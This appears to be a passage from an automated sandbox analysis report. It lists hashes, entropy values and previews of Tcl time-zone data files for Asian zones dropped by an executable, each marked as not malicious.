                                                                                                                                                                                                                              Entropy (8bit):4.396286144160272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862dmdH35Cy6DvjeQXvjKEn6vNEhFc0bkTfb2iWToN1:5de3IjjeQ/jKE6vNNa8
                                                                                                                                                                                                                              MD5:DF604BCD42A3C1E6BABD0E4FF5764CA3
                                                                                                                                                                                                                              SHA1:984111F3A75EE7D8760AA2B839010545AF8EE359
                                                                                                                                                                                                                              SHA-256:4E7F7ACAE8B4018A835328744F680C8054771805BB0BB07678A09737963C090D
                                                                                                                                                                                                                              SHA-512:690AC3FC7CA3C66AA70F17E38C6B43FFACAB3F86040C3BA94FBFF80AC8C1AECF8192E503282109DABF3228F8DC73C732F1041C80455B8B26BDB25C4C32FA286A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Karachi) {.. {-9223372036854775808 16092 0 LMT}.. {-1988166492 19800 0 +0530}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 +0530}.. {-576135000 18000 0 +05}.. {38775600 18000 0 PKT}.. {1018119600 21600 1 PKST}.. {1033840800 18000 0 PKT}.. {1212260400 21600 1 PKST}.. {1225476000 18000 0 PKT}.. {1239735600 21600 1 PKST}.. {1257012000 18000 0 PKT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.967143524972358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2WFKu3e2WFKjov:SlSWB9vsM3yMGSHAIgvAN/2wKulwKjy
                                                                                                                                                                                                                              MD5:259662F35AA09A891C2DDF8FCFECD6F0
                                                                                                                                                                                                                              SHA1:DBB3A363A34C33F0B6B0D677E43C2985E2BAF976
                                                                                                                                                                                                                              SHA-256:7B2251F0A41CBADF45D69F24604834167B14D8D33B510E635719AB404CABBCE2
                                                                                                                                                                                                                              SHA-512:CD7E514555D58985C774535556B66542EFC5FB7CD5891F42FE21B591612CB7EBD4B41E96593E26E9283BA1B01EF3BE0FDFAE871F5EF6ADF2286AF1E479DCB44B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.896398105471451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKXIi7hvXMXGm2OHF+VT5oHsQKwMTXvv6Q6zRk8P4VvW/:SlSWB9eg/2wKYghfDm2OH0T5oHxNMzv8
                                                                                                                                                                                                                              MD5:7AC6429D2A08372C71C61B4521246FEC
                                                                                                                                                                                                                              SHA1:6E50F5AD1018398491453D751F8B717B618EF46E
                                                                                                                                                                                                                              SHA-256:F0A0816E62036637F75081CBF17A1E6B8FBC2D86AEC3CD2E234BBBDD6EC9F109
                                                                                                                                                                                                                              SHA-512:A5389A318896ABCAFE419262F6B8CA86C917788F1E2AFBC8CB1C074A52870E7A92C9F6F7D79DDE4AB0D267D870D3CCD69B3FC5FD57520352EFE36C583B493FB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kathmandu) {.. {-9223372036854775808 20476 0 LMT}.. {-1577943676 19800 0 +0530}.. {504901800 20700 0 +0545}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.8363583658476745
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8yIi7V5XHAIgN1AIilvWARL/2WFKSiZ1/2WFKXIi7y:SlSWB9vsM3y7gVJHAIg5QOAN/2wKSg15
                                                                                                                                                                                                                              MD5:4CCC96293A33113D9ADC4130DCD19CBA
                                                                                                                                                                                                                              SHA1:7BAB4B8DD6BB415A2FC86D9AB36BE2A893C03153
                                                                                                                                                                                                                              SHA-256:9ACC9586B6F8B53BFE8B242283A434A9A9633D60559EBFDEE263B4C8915D50CA
                                                                                                                                                                                                                              SHA-512:644E1777E01C15A728E30526F131462FCE50476A8FEDA9B99F41D95013BB8833A79437E75AA2025E2FD2E253B9AD40709DEF77E1F0C73DAAE7A9CF886A175A03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kathmandu)]} {.. LoadTimeZoneFile Asia/Kathmandu..}..set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2119
                                                                                                                                                                                                                              Entropy (8bit):3.707911838150672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5No6r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFYkRDhUBAc6l:r5PhtjLiII2JBC6c6l
                                                                                                                                                                                                                              MD5:D7B394A9662D60D01781005FE73CC9E8
                                                                                                                                                                                                                              SHA1:50B5EBD02596DC45D1F69358C5B69DD3058905FC
                                                                                                                                                                                                                              SHA-256:33203D7FB7F3D1F848640ECE0642A2305E1863B4D47413075E2E7E40BD7418E7
                                                                                                                                                                                                                              SHA-512:055EBA420F2F6049E803796ACCA263264B9E585E5312A86B8DF7B409C5F1CB1810F3AEDACD66CCF4605E55198947D263C240486C2A4D453D23C89802F0C66BBA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Khandyga) {.. {-9223372036854775808 32533 0 LMT}.. {-1579424533 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):4.614218930153471
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKvhfDm2OHEX3gYoHrXdUvvYbQLpUFdvjSVVFJLNsR/QFckVVFJLLW:MB8623tmdHNYCDWXYbQtUTvjAJBs50vs
                                                                                                                                                                                                                              MD5:248F1B5A26455000C936CE8BC02C1A0B
                                                                                                                                                                                                                              SHA1:0C3F8CD4E038B113E5238AC52652809B6CA27999
                                                                                                                                                                                                                              SHA-256:6D464564ED2EFC9DADA1586D4FC99FE333726D2BE15A00E30C2391F588896463
                                                                                                                                                                                                                              SHA-512:AF36B0B3D410305ED504726C87265ACCAF5577A9B5DD7E7DAF135420E356C651287873197431B65B5317B4BA2009274288E4F101AC1274045A8D99E2414AB132
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kolkata) {.. {-9223372036854775808 21208 0 LMT}.. {-3645237208 21200 0 HMT}.. {-3155694800 19270 0 MMT}.. {-2019705670 19800 0 IST}.. {-891581400 23400 1 +0630}.. {-872058600 19800 0 IST}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 IST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7086418466382605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ote2CoXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEw:5B40yVRB7VfXucydm46I/CTxwh
                                                                                                                                                                                                                              MD5:A59F7FFD0C3EBAD47EC5F2B89EBBD9FA
                                                                                                                                                                                                                              SHA1:ACB94E28E0CF7C6606086267CEA1F63A3E755F56
                                                                                                                                                                                                                              SHA-256:53B8D5E7FB1BD67FECE66A933D9BDBB773F14A8C04D316A2A1B00EC6DBC151DD
                                                                                                                                                                                                                              SHA-512:7B3886B9D0A793CCEEDB2B190523922CFEBE5C82A5201C9EFA30CA4C7F63FB75C998CC7E1BD48D5D489F16E36FC0C22BD954CB7D321B3C09B36B60629C4C9F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Krasnoyarsk) {.. {-9223372036854775808 22286 0 LMT}.. {-1577513486 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.956557779400841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/2WFK1NFWFKf1z:SlSWB9vsM3yUgHAIgWv6N/2wK1NFwKf9
                                                                                                                                                                                                                              MD5:E70767DA85A7E1FA9395FF0B16CFE5CE
                                                                                                                                                                                                                              SHA1:3F78034F166CFC80B54E56AF289C7700A7E4AA5C
                                                                                                                                                                                                                              SHA-256:056D352DDCFEC155375430FFF3C8743ED5C9B51B866A099E97E12CC381071F50
                                                                                                                                                                                                                              SHA-512:FEDC854FB043AA79F132827F98F8983E480727FAA039CF2FB5B82611E724312A4F3F006EE58707F12B0AA90F5872E17F76E2A040CFB3A90D017C5CF92E52DA0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Asia/Kuala_Lumpur) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):669
                                                                                                                                                                                                                              Entropy (8bit):4.074079100812583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKPLBDm2OHXoH3UTdMVSSFVM5qGeCiKaFzsBRcerUNwGvULhMXeiCs:MB862HL1mdHXC3UBMxJJo9rphTXUzHHF
                                                                                                                                                                                                                              MD5:489E706324960E86B6E174D913C72E02
                                                                                                                                                                                                                              SHA1:C7D77482C0D41F3426FC269B3B6C0575EF0E8C7E
                                                                                                                                                                                                                              SHA-256:6E35E560675B0B5322474900D4EC8326C504788C1F82E533B09785DEEFF092DF
                                                                                                                                                                                                                              SHA-512:5CEFD44656C041E59A16481E042EA914E7C003BDE6ADF5F49B57052E91F4F732A91A244BD8BC09EF5DC2640D3210DEE53882717C5C4CBD85CCE44A93B028E9C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kuching) {.. {-9223372036854775808 26480 0 LMT}.. {-1383463280 27000 0 +0730}.. {-1167636600 28800 0 +08}.. {-1082448000 30000 1 +08}.. {-1074586800 28800 0 +08}.. {-1050825600 30000 1 +08}.. {-1042964400 28800 0 +08}.. {-1019289600 30000 1 +08}.. {-1011428400 28800 0 +08}.. {-987753600 30000 1 +08}.. {-979892400 28800 0 +08}.. {-956217600 30000 1 +08}.. {-948356400 28800 0 +08}.. {-924595200 30000 1 +08}.. {-916734000 28800 0 +08}.. {-893059200 30000 1 +08}.. {-885198000 28800 0 +08}.. {-879667200 32400 0 +09}.. {-767005200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.877362838821003
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFKdQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKdQ6
                                                                                                                                                                                                                              MD5:EA1DB4B80CC74CBA024B9BF3734B31F2
                                                                                                                                                                                                                              SHA1:D8131C093BCA3B378BEC606CFEB56A40CB4E246F
                                                                                                                                                                                                                              SHA-256:8E0C60A9AA64FB8602EDC35311F7436B04853970A21C1F6C871494A09AAD5787
                                                                                                                                                                                                                              SHA-512:3B57C9CCC16AA4FE71D275D5EC6A7BC1838841023EE4408158362A7E13E7F1B345F7D95006BC8D2FC270158864E286A1A9364C792F679D5803BD82148399C199
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.781739054385376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8PWXHAIgNz+NOARL/2WFKf+WFKkvn:SlSWB9vsM3yOHAIg1AN/2wKGwKmn
                                                                                                                                                                                                                              MD5:55DAE27AEAA74FE822338C20B6CDFF68
                                                                                                                                                                                                                              SHA1:F00EB827DC29EB2063B3A0EDBC39856637C55F33
                                                                                                                                                                                                                              SHA-256:4308D741C83B263C7C9FB8EC692A7B7B502135E407B265B12EA7EF92523455C0
                                                                                                                                                                                                                              SHA-512:398EE6015C58BDBBEAB49B74833B938FD84DE1AC6D3B8D095CE772ECA980D9E93F4EBFFFFCEAE7F91E287C8CE4F94B1A078D8E1460C352B7C2018F99915838FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Macau)]} {.. LoadTimeZoneFile Asia/Macau..}..set TZData(:Asia/Macao) $TZData(:Asia/Macau)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2217
                                                                                                                                                                                                                              Entropy (8bit):3.9638741177777868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ReCX8Iv3nhPHCvzncCHg9PHjZzH+0HDHN1aHhHNaezHBjHeHsH65H18HDH983lY:5d8u3hfCTcaOrh6qn151Wf3Bogp+nlC
                                                                                                                                                                                                                              MD5:B184E7403CB7168607D2C9E158F86A3B
                                                                                                                                                                                                                              SHA1:48B003B8F822BE979FBCB08CBDBFFC617BCF99DB
                                                                                                                                                                                                                              SHA-256:FBCB92CECB1CB0BC284ADC30D70C5F57B3AFC992136A0D898ABC64490BB700FB
                                                                                                                                                                                                                              SHA-512:D8C5C67CAEB7C670B7BD1DACC1203C4DEE4DDB16A780F502C4440997CFCFF869E86842EF87C2CD0E0B942941C02A6BC3BDAB7CEAD78B026B68F4A031173400C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Macau) {.. {-9223372036854775808 27250 0 LMT}.. {-2056692850 28800 0 CST}.. {-884509200 32400 0 +09}.. {-873280800 36000 1 +09}.. {-855918000 32400 0 +09}.. {-841744800 36000 1 +09}.. {-828529200 32400 0 +10}.. {-765363600 28800 0 CT}.. {-747046800 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716461200 32400 1 CDT}.. {-697021200 28800 0 CST}.. {-683715600 32400 1 CDT}.. {-667990800 28800 0 CST}.. {-654771600 32400 1 CDT}.. {-636627600 28800 0 CST}.. {-623322000 32400 1 CDT}.. {-605178000 28800 0 CST}.. {-591872400 32400 1 CDT}.. {-573642000 28800 0 CST}.. {-559818000 32400 1 CDT}.. {-541674000 28800 0 CST}.. {-528368400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-498128400 32400 1 CDT}.. {-478774800 28800 0 CST}.. {-466678800 32400 1 CDT}.. {-446720400 28800 0 CST}.. {-435229200 32400 1 CDT}.. {-415258200 28800 0 CST}.. {-403158600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2088
                                                                                                                                                                                                                              Entropy (8bit):3.7643610103361134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5he9dbbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKx/y:5wv+0j6lua2Gg/3gO8UoOZU2Wc/pKo
                                                                                                                                                                                                                              MD5:F62A89F441C9C17EB99F64223C815651
                                                                                                                                                                                                                              SHA1:408C38A79E056FF9B03D0DA85114DC015CB66938
                                                                                                                                                                                                                              SHA-256:0C6EEEB7975A95C2B0678D137E6A735238D244A37FA11078050051511DE499FE
                                                                                                                                                                                                                              SHA-512:55DC72546BDC26450D5318E9D2819E32A91C27D06A7AF5432BD50F8722C69984BBAA8599055A824D2935D919F0C0AA357687DD9B47F49F213EEE21AF7458FE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                              MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                              SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                              SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                              SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):421
                                                                                                                                                                                                                              Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                              MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                              SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                              SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                              SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                              MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                              SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                              SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                              SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7625
                                                                                                                                                                                                                              Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                              SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                              SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                              SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
